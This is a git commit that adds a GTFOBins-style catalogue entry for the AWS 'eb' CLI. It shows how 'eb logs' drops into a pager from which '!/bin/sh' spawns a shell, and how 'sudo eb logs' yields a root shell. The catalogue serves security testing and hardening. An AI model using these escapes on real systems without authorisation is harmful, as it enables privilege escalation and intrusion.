This commit is contained in:
Andrea Cardaci
2020-03-04 20:24:29 +01:00
committed by GitHub
parent b19420d1fd
commit 1b4e4ab15e

12
_gtfobins/eb.md Normal file
View File

@@ -0,0 +1,12 @@
---
description: This invokes the default logging service, which is likely to be [`journalctl`](/gtfobins/journalctl/), other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.
functions:
shell:
- code: |
eb logs
!/bin/sh
sudo:
- code: |
sudo eb logs
!/bin/sh
---